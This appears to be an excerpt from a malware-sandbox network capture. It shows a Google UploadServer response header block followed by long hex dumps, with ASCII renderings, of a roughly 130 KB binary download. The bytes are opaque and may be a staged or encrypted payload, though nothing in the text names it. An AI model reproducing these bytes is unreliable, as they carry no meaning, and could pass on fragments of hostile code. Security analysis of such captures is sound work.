                                                                                                Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, 
X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token
                                                                                                Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                Content-Length: 130624
                                                                                                Date: Mon, 20 Mar 2023 10:06:10 GMT
                                                                                                Expires: Mon, 20 Mar 2023 10:06:10 GMT
                                                                                                Cache-Control: private, max-age=0
                                                                                                X-Goog-Hash: crc32c=9BUYhA==
                                                                                                Server: UploadServer
                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                Connection: close
                                                                                                Data Ascii: J{\VO.'u>.)H_UV.iqI=EvYE_\y>T*4 sq.y)M{A#?C"F14#D|Mfc8Y9-~^lF.aX"M3A ; +_e"0D].\[Mntc%I&$QS(
                                                                                                2023-03-20 10:06:10 UTC24INData Raw: 7a e2 c2 33 9b 57 23 cf 3c bf 08 dc 45 ac 87 57 36 af 3b d3 d4 74 dd 99 37 9c 27 df 95 da 0d 08 b5 a1 12 88 fc 3c f7 22 4e c6 6b 00 98 54 df 0e a3 be 85 81 5b 0a 4d 43 ab 3b 53 b6 6d c1 44 20 81 80 a3 3c 10 d5 91 ed 9a ac 3e 56 49 88 a4 d5 42 f2 26 53 ed 84 4c 0e e9 93 1e 1c dd 46 a4 0a 3e cf 3d b8 bf 35 0c 2d 68 7e 98 52 ca bd a0 db 14 ef 11 55 c5 04 33 8e 8f 09 61 30 f6 25 99 38 12 71 26 c7 cd 33 9a 9a c8 c0 27 43 53 bb 27 a4 84 c3 b7 63 27 69 e4 e0 6e 8c 37 bc 1d 0c 1e c9 f9 a3 de 1b 79 6b d9 57 e7 e6 d0 32 3e 55 78 96 23 2c 21 16 3c a6 cb 9e d6 96 f5 0e 6b 36 fe ce cd 1f 0c af 86 73 4e a9 4c d8 68 e0 04 39 dc 8a eb 32 1d ff cb 61 c0 71 6f 3f e3 8a d3 97 ae f1 b6 48 5d 39 3a d3 c3 2e c5 fb 9b 06 c4 c1 bd 67 64 19 d9 5e 26 7b 92 9a 21 56 d7 73 cd eb 0b
                                                                                                Data Ascii: z3W#<EW6;t7'<"NkT[MC;SmD <>VIB&SLF>=5-h~RU3a0%8q&3'CS'c'in7ykW2>Ux#,!<k6sNLh92aqo?H]9:.gd^&{!Vs
                                                                                                2023-03-20 10:06:10 UTC25INData Raw: d6 85 e5 6d 25 13 6c 6c 3a 5f 98 ed d1 f2 51 f3 18 05 b1 10 d3 ef e8 4c 6f 29 3d f9 a9 ab 2c 38 0e 79 35 a3 08 39 61 04 fa cf 83 7b d4 d6 ef 13 4f 04 12 08 cc 17 0a 4e 7e 0a bc 44 82 ad ae 60 30 22 9f cf 32 00 5f 3a 3f da 18 a3 1f f2 18 67 75 17 39 c8 82 a7 bb af da 4e b5 d5 5d e2 6c ca 12 6d ee b6 f8 e4 c3 65 e5 4b 8d 4a 69 68 b3 51 7c 53 d2 3a a1 39 53 86 61 45 80 5e aa a9 72 c7 68 85 78 ae 5d d7 27 49 96 bd 23 b3 6e 84 26 b6 2f d1 9e 81 0c 6b 28 6f cf 44 52 ef 8d d4 4f 4a 1c d8 40 97 04 70 73 d9 8f ca 3a 19 1d 1c 9a a9 28 bc 45 0f d6 4a ba 76 43 77 a1 93 84 53 b3 a0 a3 18 f9 5c 5e 7b 0b b1 c4 48 89 e8 cd 73 48 1b d5 ee 8e c2 fc 54 54 0e 0e 00 8c 32 49 18 5f 84 d5 d8 cd c4 e2 f7 f0 8c 48 d3 67 a5 a2 7c 3e 18 2e 68 5f ac ac a3 a0 9c 2a 29 64 e6 43 01 7e
                                                                                                Data Ascii: m%ll:_QLo)=,8y59a{ON~D`0"2_:?gu9N]lmeKJihQ|S:9SaE^rhx]'I#n&/k(oDROJ@ps:(EJvCwS\^{HsHTT2I_Hg|>.h_*)dC~
                                                                                                2023-03-20 10:06:10 UTC26INData Raw: 84 47 cc cd cb 42 3c 51 da a6 6e ca 19 0d 09 2f 3a d5 48 7b 7d 49 17 74 29 d3 7e f4 38 3a 95 51 62 7f c1 02 78 e2 95 e2 f4 a5 f5 80 5c b6 d6 de c0 94 ab 96 53 59 78 ac 53 ac b7 69 4a cf 25 10 2b f6 ce ed 2d b8 af 78 22 b6 d2 ea 9e ea aa 35 7d a9 29 5d 40 4d e1 21 8b a8 69 15 fe 94 ba a3 fe 0c 37 71 91 13 a9 26 0d 7c 06 1d 60 b2 2f bf 05 14 9a bc 56 f6 72 f4 45 88 f2 e5 ca ef e7 06 12 64 9a e3 4d db f5 e6 82 6a 90 e7 1c 04 cf 9a 52 38 b1 ec 5c 82 e6 55 3a 89 8a 37 33 a4 41 69 a2 69 2c f1 2e ba ea 25 c3 da 3c 9a 28 fd 82 ec de 56 cb f8 b5 6b 99 8d 1b 60 53 21 be 6c c1 2e d9 6d b6 f4 2c 19 af 4b bc cc 61 23 90 49 bf 35 da f4 b0 01 40 b7 ae f3 df 81 6e fd 29 4d c3 1b 92 ef 54 af 65 ac b0 84 8b 3e 5f 1d 43 a1 4d 16 b1 6f ca 67 0b 80 84 d1 28 ed d5 91 e3 c0 bd
                                                                                                Data Ascii: GB<Qn/:H{}It)~8:Qbx\SYxSiJ%+-x"5})]@M!i7q&|`/VrEdMjR8\U:73Aii,.%<(Vk`S!l.m,Ka#I5@n)MTe>_CMog(
                                                                                                2023-03-20 10:06:10 UTC27INData Raw: 01 b9 26 05 33 00 dd b4 cd 87 89 4e 6d 21 20 f1 09 93 5e a5 86 72 5d a3 26 91 7f 3a 13 4a cb 98 e5 13 14 ff c2 70 c4 7e 76 2b fd f4 fa ba a3 f9 d2 17 75 17 3f fb db b1 d4 f6 83 d0 d7 c4 d7 3a 73 cf ce 2e 36 74 83 9d 38 9e c7 7b 49 8f 15 20 42 dc d9 32 5a 1c 9f 92 07 2d 6e 6c a9 dc d6 c5 53 c5 f5 d4 29 d1 90 9c 68 84 87 cc 09 fd 96 fd 54 6b a8 4a b8 f1 65 19 3a be 10 f3 4f a2 51 5c 6a 11 c9 c8 4b 3e ea 8e 10 e3 4e 75 70 1e 4b cd 1c 63 8a f1 7e cb b0 6a 0c a7 0f 92 4c 49 63 d4 4f 52 e0 88 93 e0 f8 1d e3 20 d4 b6 9e e0 6e cc ae 20 30 c8 af c7 9c d9 de ba 72 34 08 2d 85 8f 2a 57 b7 87 e0 12 07 b0 10 d1 ef e8 a5 b1 29 23 ff b5 94 bd 29 15 58 24 b7 35 e3 63 3c ef dd 5e 73 c5 c4 f8 c9 db 65 93 12 53 5a dc 5d 6d 3e 7e ca 93 9c 4b 59 2c ad f6 d2 68 49 89 b7 69 c0
                                                                                                Data Ascii: &3Nm! ^r]&:Jp~v+u?:s.6t8{I B2Z-nlS)hTkJe:OQ\jK>NupKc~jLIcOR n 0r4-*W)#)X$5c<^seSZ]m>~KY,hIi
                                                                                                2023-03-20 10:06:10 UTC28INData Raw: 36 92 20 09 5a 75 b0 7b 5f df 88 e1 c5 7a 96 c6 73 a2 ce 55 8c fc 36 d4 76 0f 99 99 6f 50 f3 2f c9 3e b0 f9 8e 15 d7 2b 67 ab c6 25 59 1d fb 03 ec b0 fc d4 c3 87 22 06 ee c8 6e c0 bf 70 40 15 8c 4d 47 cf e2 aa e6 ec 88 0b 67 ed 43 0b 69 45 05 4a 12 67 5a f6 15 49 00 e5 ea 00 18 24 eb aa 2a 3e 39 14 a7 09 d3 73 e2 53 10 0a 90 cb 7e 8f b3 f4 a7 a6 39 37 c0 73 29 9f 8c 7f b9 13 e8 e4 f9 6d 1f 15 c3 46 b2 b7 27 1f b3 42 22 82 fc 30 38 c9 14 50 cd c7 56 b1 7c f4 fd 44 b3 80 6f cb dc 01 e0 1d 72 30 70 92 ee a0 3a 91 89 7e 18 66 2a 5e 09 c9 b1 85 47 ca c6 cc 30 ce 46 dc d6 4c d0 18 0d 4f 09 3c ec 2d 79 f3 2a 03 a6 07 36 f2 ae 38 3d fb 46 61 68 cf 03 a0 7f fa e3 3d 8a d8 96 5d bc d6 f1 58 93 d9 73 7c 4d 1e eb 6b ac b7 65 28 4a 34 17 53 f8 e1 fb 75 f6 b3 79 28 98
                                                                                                Data Ascii: 6 Zu{_zsU6voP/>+g%Y"np@MGgCiEJgZI$*>9sS~97s)mF'B"08PV|Dor0p:~f*^G0FLO<-y*68=Fah=]Xs|Mke(J4Suy(
                                                                                                2023-03-20 10:06:10 UTC30INData Raw: d2 6d fb db 62 6b 95 9c 3f b7 1e 3c 39 53 bf 08 d9 48 aa f4 38 16 af 4b 71 f4 77 2a 38 1e 8c 46 61 ac df 51 e3 92 bd 8d e5 23 4b ed 50 7b e5 69 0b 68 71 c4 1b 8e 13 a1 9d 23 34 3d 43 db 9d 7e 23 6f ba 1f 33 8c fa aa 47 42 d1 80 e4 9a fa 3f 56 49 08 ad d0 cc 9f 5b 07 fc 83 5f da f8 ef 5b 1b cc 44 b2 e5 c1 30 c8 c5 ec eb 1c 0c 40 4a b2 52 c0 ae bd eb 3e bf 8b 55 cf da 04 8e a5 59 7d 32 8d 68 99 38 16 1c 27 c6 cd 6e b3 8b c9 aa 2c 49 55 b8 23 b5 80 ab ba 61 5d 3f d4 e4 6a d8 24 bd 1d 43 1e c9 e8 a1 ba 56 51 7c dc 29 ec 95 3f 12 16 34 51 d0 29 27 2c 0f 39 b1 bd ad da 94 88 54 6c 44 1b c1 df 6e 63 bf 87 73 48 8d 31 bf 0d e0 00 4d d1 83 d2 0b 34 ee ca 66 a5 66 66 2c e3 8c 0f a8 a5 e5 de 00 65 2e 3f fb d1 28 d4 f6 e9 e9 e3 c3 b6 5b 79 18 dd 26 2a 7d 83 97 7b 42
                                                                                                Data Ascii: mbk?<9SH8Kqw*8FaQ#KP{ihq#4=C~#o3GB?VI[_[D0@JR>UY}2h8'n,IU#a]?j$CVQ|)?4Q)',9TlDncsH1M4fff,e.?([y&*}{B
                                                                                                2023-03-20 10:06:10 UTC31INData Raw: c6 de 42 cd 97 b6 8c f4 6b bd 84 b9 3e 29 53 89 f0 f6 a8 9a 6d 2c 14 ba 00 fc 77 f3 45 47 3a 42 4a 83 91 9f 92 21 4a 47 1e 0a 39 02 96 db d6 db 7f 76 f3 f5 61 7e 25 0d 73 e3 68 11 5f 7a 8d 49 c7 f0 ee 8b 48 56 81 b7 46 b2 5e 55 29 36 be 9e f9 1f f6 08 4f 44 4f a5 48 d7 27 b0 ab c5 50 9d c2 4d e5 71 9c 61 6a ff b5 9b c9 fc 85 6b 34 11 4a 69 b2 b5 f4 30 67 d2 3e bd aa 38 86 49 11 aa 5e a0 77 69 f7 46 c4 c8 ae 5d d7 19 49 96 bf 23 c0 76 d2 27 bc 25 93 5c 81 0c 7d 22 69 a0 19 53 ef 86 d9 81 4c 17 a3 78 1b 04 35 73 df f1 d0 24 05 3f 07 b0 cb 30 cc 11 39 d7 3a 98 3d 5e fa 94 99 84 54 e5 a9 d0 87 df 57 29 ab cf 81 cd 57 f6 f3 cc 75 ec 18 cb b4 f0 e3 fc 2e fa 23 2e 3a e2 3e 48 1f 36 3d f1 c2 b9 e2 19 e4 86 38 7e cf 56 dd ad 7d 3e 19 9d 4a 31 31 c8 82 d0 83 95 00
                                                                                                Data Ascii: Bk>)Sm,wEG:BJ!JG9va~%sh_zIHVF^U)6ODOH'PMqajk4Ji0g>8I^wiF]I#v'%\}"iSLx5s$?09:=^TW)Wu.#.:>H6=8~V}>J11
                                                                                                2023-03-20 10:06:11 UTC32INData Raw: 08 3e 0f ba a4 92 b9 cf dc ce 30 04 60 dc d6 35 e2 79 0d 49 25 2c 3a 4b 26 e0 2c 1e a2 12 48 ee 23 07 3a 94 5c 45 7e bb c5 55 6c 8c 57 0b 9a e9 23 79 a4 a4 4d 61 94 db 3e 7e 54 7f 80 d4 88 ad 11 14 6c 25 60 83 d8 d2 ea 00 3b 8b 64 5a dd d1 eb ee 42 f0 9d 7c a9 53 21 e2 33 ea 2b 80 ab 72 33 d6 d4 90 a3 f4 8c 27 41 97 17 60 25 1c 7b 50 cb 73 a4 3e b8 66 79 81 5c d8 21 ee f4 45 5c e8 c6 ee cd ea 2d 3e 7f 9d 79 76 8f f5 f7 8c db f1 e7 36 4f d3 44 42 1d 99 d8 5c 91 ec 46 3f de a3 67 33 ce 4a b7 a2 79 2c f8 39 28 e7 2c ca 4f 65 60 2c 92 85 fd d8 3e 05 d8 2c 78 86 91 1b 8c 52 21 be 1e f2 38 d8 1d 94 c0 57 3c a5 31 d3 d7 13 3c 9b 3b 92 3f dd f6 3e 06 41 c7 cb 86 e0 81 68 d1 24 62 a1 69 7b c0 58 d7 33 b8 b0 84 81 56 18 07 42 ab 39 41 7a 7c bc 03 33 86 bc b6 46 42
                                                                                                Data Ascii: >0`5yI%,:K&,H#:\E~UlW#yMa>~Tl%`;dZB|S!3+r3'A`%{Ps>fy\!E\->yv6ODB\F?g3Jy,9(,Oe`,>,xR!8W<1<;?>Ah$bi{X3VB9Az|3FB
                                                                                                2023-03-20 10:06:11 UTC33INData Raw: 29 12 36 52 97 29 57 30 2d 59 b7 ce b8 cd 6a 8d 4e 6e 44 d1 e7 df 6e 1a 8d e6 73 4e a1 21 69 6b bf 13 4b cc 87 c7 75 28 63 f5 61 ca 7c 42 3a 97 e8 e7 bb d3 51 e8 10 54 9b 1b e3 a3 94 ed f1 eb a4 e1 da d7 30 c6 3c c7 52 16 5b 92 e0 ab 62 cd 62 c2 44 27 e6 27 49 75 60 2a be b6 02 0e 3c 6d 69 b5 aa cb 51 42 c5 85 47 10 9f 87
                                                                                                Data Ascii: )6R)W0-YjNnDnsN!ikKu(ca|B:QT0<R[bbD''Iu`*<miQBG
                                                                                                2023-03-20 10:06:11 UTC33INData Raw: 8d 6b 13 9d c4 87 90 81 27 6d ff bf 9c a1 f6 5f 2c 23 36 47 0b 69 4a 74 4b bc 42 8b ed 63 0b f9 81 12 e6 51 7a 4e 46 c5 a4 3e 2e 8a f1 5e 8a a4 7c 1d a8 07 1c 25 52 ed bd 67 96 e1 88 99 8a e8 12 ef 30 c5 be 10 cd 66 42 c6 c5 02 df bf aa 8d f4 61 ee 7a ba 70 3a 40 84 d4 cd e4 87 ea 61 fb 88 01 a9 49 c7 b2 6b 30 38 e8 a0 f5 89 31 04 54 3e a2 50 d8 55 34 8e a0 d0 7a d4 d0 c9 15 67 61 0d 03 4b 41 02 77 4c 2e 6c db 85 c2 b1 49 26 25 88 1f a1 58 49 29 3c f8 82 f8 1f f2 1e 53 6b 7b 4a 6f dd d7 d4 b6 c4 54 9b cf 5b f3 61 38 77 45 ee c2 e5 d2 c3 65 93 d8 ea 4d 78 6b d7 f2 30 53 a2 51 aa b8 36 80 72 44 bb 5b 82 6e 69 f7 6a 96 dc bf 55 fb 5a 4f be 97 22 c0 7c ea 1a bd 25 f3 32 6c 0c 6d 28 41 68 5d 53 e9 94 cb a0 41 03 21 78 08 0e 61 79 c9 1e d1 28 12 06 1b 9d dd 12
                                                                                                Data Ascii: k'm_,#6GiJtKBcQzNF>.^|%Rg0fBazp:@aIk081T>PU4zgaKAwL.lI&%XI)<Sk{JoT[a8wEeMxk0SQ6rD[nijUZO"|%2lm(Ah]SA!xay(
                                                                                                2023-03-20 10:06:11 UTC35INData Raw: 73 e2 5d 12 09 b8 a5 2e 8f b9 7e 72 a6 39 19 81 6f 38 98 9b a9 aa 14 ea e3 e8 6b 76 f4 3d b9 27 b6 27 c1 b3 67 0a b6 b8 30 32 db 01 60 e1 97 2a b0 76 2a b8 44 99 d0 73 d4 c0 29 f7 1c 72 29 02 59 c6 f7 4b b9 cf 14 19 6c 20 4e 0f ba ae c0 47 cc cc d0 72 2b 61 a0 a7 23 ca 5c 0d 49 3e 3a db 54 51 e4 21 0f a4 4c 6e c6 ae 48 12 d2 5d 60 62 c3 14 7c 1f e3 f4 2e 8b eb 86 2e 5d f1 f6 39 fb b1 9d 5b 4b 48 82 5e c8 b7 63 2f 41 2d 29 12 fc c9 fb 02 f6 b5 79 28 98 e7 31 8d e6 ce 0d 7b 91 4e 33 ef 4d e6 3a 87 dd 8c 19 fe e2 ff be ff 0c 2a 4c 90 02 67 57 08 54 47 6d 0f be 2e bf 71 6c bb bb 37 d9 63 d7 6d 82 88 8c db f8 ea 2b 27 69 82 7c 76 18 f5 f7 80 16 f9 f6 14 22 8c 42 6a 26 98 d8 56 ed d0 47 3f 83 cd 8a 33 a4 41 9f 6a 69 2c fe 2a 65 f6 25 df aa 54 77 26 ff 8e eb 26
                                                                                                Data Ascii: s].~r9o8kv=''g02`*v*Ds)r)YKl NGr+a#\I>:TQ!LnH]`b|..]9[KH^c/A-)y(1{N3M:*LgWTGm.ql7cm+'i|v"Bj&VG?3Aji,*e%Tw&&
                                                                                                2023-03-20 10:06:11 UTC36INData Raw: b4 c5 ec 3f 1f 24 16 75 b2 52 ce ac be c3 50 ef 8b 5f 45 0f 04 8e 8b 18 61 23 8a 7f 4f 2b 11 1e 20 d7 cb 07 52 75 36 3f 2d 49 8b b8 06 9d b4 ef ba 6b 4f 2a e4 c8 3a a4 25 b7 c3 06 1e e3 b8 bd a5 4a 79 6b dd 29 f5 e7 d0 38 41 45 79 96 43 26 26 05 29 b7 ce b2 9f 94 8e 5e 70 06 fe e6 a3 1f 0c a5 c3 73 4e ba 37 88 74 c8 17 46 dd 81 99 f1 02 ee ba 49 8c 7d 67 26 ef 9b d3 c8 bc f2 cd 01 56 3e 4c 1a f6 2f b5 9e 81 07 c4 c5 e0 32 4c 7c dd 20 2d 76 9a a9 3a 46 d6 73 c0 89 19 fb 55 0c 43 ba 49 1a 88 92 09 04 70 7b b8 d4 c7 40 45 b3 7b 6d 38 a9 e8 90 60 93 90 c9 80 85 86 55 79 d0 a8 3a dd ec 4f 2b 34 23 7d ec 86 b2 f9 68 94 9c eb a7 56 3e f9 87 0b f0 4e 7f 4e d1 c5 a4 32 e3 82 e0 7c e7 fb 7a 35 93 06 1c 2f 2e d1 bc 67 cb 8f 65 99 e0 e3 3a 27 20 c5 b8 03 80 77 4b d3
                                                                                                Data Ascii: ?$uRP_Ea#O+ Ru6?-IkO*:%Jyk)8AEyC&&)^psN7tFI}g&V>L/2L| -v:FsUCIp{@E{m8`Uy:O+4#}hV>NN2|z5/.ge:' wK
                                                                                                2023-03-20 10:06:11 UTC37INData Raw: f2 c0 c9 ee c2 15 37 e3 6d 4a 69 66 b6 dc 66 58 d2 3e b3 a8 3b ae 27 41 aa 54 2a a2 69 f7 68 85 d4 bf 5a c0 cf 5a 91 bd 24 d1 70 bb c6 42 da 06 5d 81 d2 7d 07 41 94 5d 53 e5 94 cc b1 60 47 df 79 11 da 70 73 f5 a1 cc 3b 19 17 10 b1 cb 29 be 6d 14 80 4b b0 7b 34 fb 9e 93 94 52 96 b6 95 87 d9 5d 35 e9 2a a6 b1 26 99 e9 88 75 ea 2f cd 83 89 cb eb 25 f6 21 65 d0 da 3e 38 30 1f 26 f0 c8 b5 f5 c5 84 9f 2f 6d ce 65 cd de 9c 19 1e fc 22 59 df ef 84 86 ea a0 64 e7 e6 49 07 65 7c 36 5a 15 70 8b 8a 09 59 07 f2 fb e4 eb dc 02 46 2d 06 f0 05 82 21 e0 62 e5 2b ec 23 90 93 41 92 b2 fe 7f ab 3e 0c 86 1d 2c b7 8c 0f d6 0e fa e4 ff 7e 4c 13 d2 41 aa 95 0f 1f d3 2d 3f 83 b8 36 2b cd 1e 65 e1 00 2a b0 7a e7 b0 55 bb bd 2c d2 e8 12 f6 1c 78 55 3e 58 c6 aa 25 54 cf 7e 12 44 e8
                                                                                                Data Ascii: 7mJiffX>;'AT*ihZZ$pB]}A]S`Gyps;)mK{4R]5*&u/%!e>80&/me"YdIe|6ZpYF-!b+#A>,~LA-?6+e*zU,xU>X%T~D
                                                                                                2023-03-20 10:06:11 UTC38INData Raw: 5c e3 b2 08 71 20 af 59 5b 6f 23 82 2f cf d5 57 3c bc 26 d4 02 f9 3b 89 f8 e3 c2 e8 e7 05 72 6c 93 73 de d4 f5 f7 82 05 f1 f6 1b 19 19 57 45 0c 9e c9 5a bc 0c b8 c0 76 a2 67 ed b4 6e 9f 96 69 2c f2 2a 62 e7 04 9b 54 55 6e f2 ee 84 d7 99 67 05 d8 3d 78 99 8d 20 9b 53 21 e3 6d bf 08 b2 6c bc 86 47 3c af 3b 97 d1 60 22 81 0b 90 34 a6 85 df 21 04 b7 a4 8d e1 9e 72 df 35 4b c4 63 09 fd 68 df 7a a3 f7 84 81 5b 7d 1c 45 d8 20 57 a0 69 b1 12 52 60 a3 a1 37 2d cf 90 e9 b4 9a 39 7e 26 88 a6 da c0 93 62 34 ec 84 48 0b 84 f3 4b 1c db 55 56 16 39 d9 24 c2 d4 22 0d 29 68 79 a3 55 b8 52 94 eb 66 80 96 54 c5 02 09 89 9e 1f 13 37 a5 68 e9 57 0b 0e 27 c0 de 3d b5 9a ce b2 0e 61 55 d8 4c a8 81 ef bc 72 59 35 e1 c8 ad a4 25 bb 0e 0e 0f c1 d5 e2 a3 62 42 6a dd 23 89 db d1 38
                                                                                                Data Ascii: \q Y[o#/W<&;rlsWEZvgni,*bTUng=x S!mlG<;`"4!r5Kchz[}E WiR`7-9~&b4HKUV9$")hyURfT7hW'=aULrY5%bBj#8
                                                                                                2023-03-20 10:06:11 UTC40INData Raw: 90 e8 1d c3 f5 bc 40 93 e6 66 a2 8f 90 22 de dd b4 38 f1 d0 4e 5b 90 18 fa eb 97 bf 98 46 c2 97 9b c8 4f 2e f4 a9 5e f5 5f 70 e6 1d c5 a4 30 f0 8a e0 73 dc 6e 6f 1a b9 00 0d 23 7f 0d 43 98 3e e0 88 47 f0 cc 3a db 20 c5 b4 03 87 66 6a 97 de 32 d1 61 d6 8c de 20 b7 7a ba 61 3a 5f 98 ef da e5 87 b7 12 14 ba 6b d8 61 81 a2 6b 3a 32 ac a6 86 97 2b 34 56 35 d9 23 39 72 71 fe cf db 7b cb ca c7 04 4e 04 07 71 e9 73 0a 3e 57 69 6c db 88 a7 aa 4e 55 3c 9e c5 b4 55 58 48 da e7 95 89 70 e8 18 42 6a 2f a3 60 b8 a7 bb a1 c9 5c a4 f1 5d e2 66 4d 1d 76 ef b2 8c d8 18 76 93 dd fd 4d 51 7b a4 d1 18 54 c3 39 c5 56 11 86 11 2e b7 5f aa af 64 f0 7d 82 a6 ab 75 d7 69 26 8b ad 23 c6 65 81 21 ad 22 8b 7e a9 0c 1d 4d 74 a1 5d 55 fc 82 d3 b4 60 d0 df 79 1d 17 78 62 d7 cc 93 3d 31
                                                                                                Data Ascii: @f"8N[FO.^_p0sno#C>G: fj2a za:_kak:2+4V5#9rq{Nqs>WilNU<UXHpBj/`\]fMvvMQ{T9V._d}ui&#e!"~Mt]U`yxb=1
                                                                                                2023-03-20 10:06:11 UTC41INData Raw: 5c 2c 82 51 45 56 fb 48 07 a6 b5 f9 5c be 92 fe 09 04 1c 06 90 6a 8b ba 90 0d fa 32 fb 94 5b 45 cb 14 c3 4c cb bb 59 14 a3 42 26 93 b5 18 7e c8 0f 6a 49 cc 2a b0 78 f4 b8 55 b4 86 b9 c7 c7 38 f0 0d 74 04 e2 a7 39 5f 4a b9 11 6e 3d 44 14 5e 0f b0 bd 8a 47 e4 9d cb 42 25 bf dc a6 09 8b 05 0d 49 2f 3a c4 48 6a f3 20 0f f9 3f 05 f3 c4 39 3a 94 4d 60 68 c9 50 7a 6c fd ee 1e 89 e0 fd 5d bc d6 b3 49 94 ba 9c 44 51 46 93 77 ad bd 11 ed 0d 25 60 09 bb c9 fb 0f 93 ae 7e 5b 81 f1 eb 98 eb df 6c 9d 8e 59 42 80 57 e0 2b 86 89 65 16 9b 92 90 a9 f2 04 15 72 96 13 60 22 62 67 46 1d 66 b4 f5 ac 71 69 ac bb 1e c9 10 f4 45 85 e9 e4 b4 16 cd 2d 44 03 8e 78 5e d9 f8 f0 97 02 83 e2 34 0e bf 2b 5f 1c 99 de 4f 86 eb 57 38 fb 81 4f 33 d4 24 aa a3 69 2a eb 3c 7d e2 04 0c 54 55 62
                                                                                                Data Ascii: \,QEVH\j2[ELYB&~jI*xU8t9_Jn=D^GB%I/:Hj ?9:M`hPzl]IDQFw%`~[lYBW+er`"bgFfqiE-Dx^4+_OW8O3$i*<}TUb
                                                                                                2023-03-20 10:06:11 UTC42INData Raw: e0 a9 12 36 6d 12 dd 9e 8e 24 29 18 dc 97 4b db b9 11 ce 0c 9d ba 74 c5 74 a6 ab 94 09 64 90 a8 74 eb 7b 37 0f 57 64 e5 ba b2 8b c3 d3 20 37 5e a8 23 b1 91 e2 92 27 5c 24 ee 60 61 a4 25 b9 1d 06 0f ce ee 77 b6 4d 68 6c cc 2f d8 07 2e c7 e9 44 79 48 39 02 0e 31 39 b7 c4 a1 d5 94 a6 0f 6b 36 f0 38 df 1e 26 e4 9a 73 4e ab 37 97 68 f3 00 47 dd dc ea 38 35 84 cb 61 ca 6d 67 2c e5 df d5 bb a2 e8 fd 03 5d 45 3f fb d1 6a c5 f1 8a 06 db df ee 23 65 19 d7 52 1b 39 92 e0 21 01 d6 73 cd ec 02 fc 26 15 55 60 5c 17 99 f3 ef 1b 67 0a d7 ce c1 51 44 e7 92 62 5d d9 87 87 6d 9b af f7 86 94 81 20 13 e3 a9 4a b4 e6 94 38 34 26 6a ec af a2 8a 4b bc 9b 8a cf 39 d0 de 81 68 9a 42 7b 66 10 c8 a3 25 f7 f8 f4 5c cb c8 13 00 a9 07 1a 36 45 ea ac 60 b3 c3 a0 99 90 86 0f ee 20 c3 ad
                                                                                                Data Ascii: 6m$)Kttdt{7Wd 7^#'\$`a%wMhl/.DyH919k68&sN7hG85amg,]E?j#eR9!s&U`\gQDb]m J84&jK9hB{f%\6E`
